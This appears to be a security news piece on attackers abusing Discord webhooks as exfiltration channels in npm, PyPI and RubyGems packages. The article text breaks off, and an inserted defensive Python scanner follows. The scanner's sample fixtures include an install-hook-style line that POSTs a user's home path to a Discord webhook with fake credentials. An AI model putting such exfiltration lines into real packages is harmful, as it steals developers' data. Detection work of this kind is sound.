
Threat Actors Exploit Discord Webhooks for C2 via npm, PyPI, and Ruby Packages


By Kaaviya

Threat actors are increasingly abusing Discord webhooks as covert command-and-control (C2) channels inside open-source packages, enabling stealthy exfiltration of secrets, host telemetry, and developer environment data without standing up bespoke infrastructure.

Socket’s Threat Research Team has documented active abuse across npm, PyPI, and RubyGems, where hard-coded Discord webhook URLs act as write-only sinks to siphon data over HTTPS to attacker-controlled channels.

Because webhook posts resemble ordinary JSON traffic to a widely allowed domain, these operations often bypass perimeter filtering and signature-based controls.

How Discord Webhooks Become Exfiltration Pipes

Discord webhooks are HTTPS endpoints that require only possession of a URL containing an ID and secret token to post messages to a channel.

Live endpoints typically return 204 No Content on a successful post (or 200 OK when the request carries ?wait=true), while 401, 404, and 429 indicate an invalid token, a deleted webhook, or rate limiting, respectively.

Critically, webhook URLs are write-only—defenders cannot ...
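As an added, defender-side example (not code from the article or from Socket): a small static scanner that flags hard-coded Discord webhook URLs in the files an unpacked npm, PyPI or RubyGems package ships, reporting the webhook ID and a redacted token so the finding itself does not leak the secret. It assumes the standard `discord.com` / `discordapp.com` `/api/webhooks/<id>/<token>` URL shape; the sample files, IDs and tokens below are constructed.

```python
import re
from dataclasses import dataclass
from pathlib import Path

# Standard Discord webhook URL shape: /api/webhooks/<snowflake id>/<token>.
# Assumption: discord.com and discordapp.com are the hosts worth matching.
WEBHOOK_RE = re.compile(
    r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/(\d{17,20})/([\w-]+)",
    re.IGNORECASE,
)

@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    webhook_id: str
    token_preview: str  # redacted so the report does not itself leak the secret

def redact(token: str) -> str:
    # Keep only the first and last four characters of the token.
    return f"{token[:4]}...{token[-4:]}" if len(token) > 8 else "***"

def scan_text(text: str, path: str = "<memory>") -> list[Finding]:
    # One Finding per hard-coded webhook URL, with its line number.
    found = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in WEBHOOK_RE.finditer(line):
            found.append(Finding(path, lineno, m.group(1), redact(m.group(2))))
    return found

def scan_tree(root: Path, suffixes=(".js", ".cjs", ".mjs", ".json", ".py", ".rb", ".gemspec")) -> list[Finding]:
    # Walk an unpacked package and scan the source types npm, PyPI and RubyGems ship.
    found = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in suffixes:
            found.extend(scan_text(p.read_text(errors="replace"), str(p)))
    return found

# Constructed sample files modelled on an install-time hook; the IDs and tokens are fake.
SAMPLES = {
    "pkg-npm/postinstall.js": 'const hook = "https://discord.com/api/webhooks/123456789012345678/AbCdEfGhIjKlMnOpQrStUvWxYz0123456789";\n'
                              'fetch(hook, {method: "POST", body: JSON.stringify({content: process.env.HOME})});\n',
    "pkg-pypi/setup.py": 'import urllib.request\n'
                         'URL = "https://discordapp.com/api/webhooks/987654321098765432/zYxWvUtSrQpOnMlKjIhGfEdCbA-_0987654321"\n',
    "pkg-gem/lib/clean.rb": 'puts "no webhook here"\n',
}

def demo() -> list[Finding]:
    return [f for name, text in SAMPLES.items() for f in scan_text(text, name)]

if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Run `scan_tree(Path("./unpacked-package"))` against a real extracted tarball or wheel; a hit is a strong signal to review the surrounding install-time code.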


Copyright of this story solely belongs to gbhackers.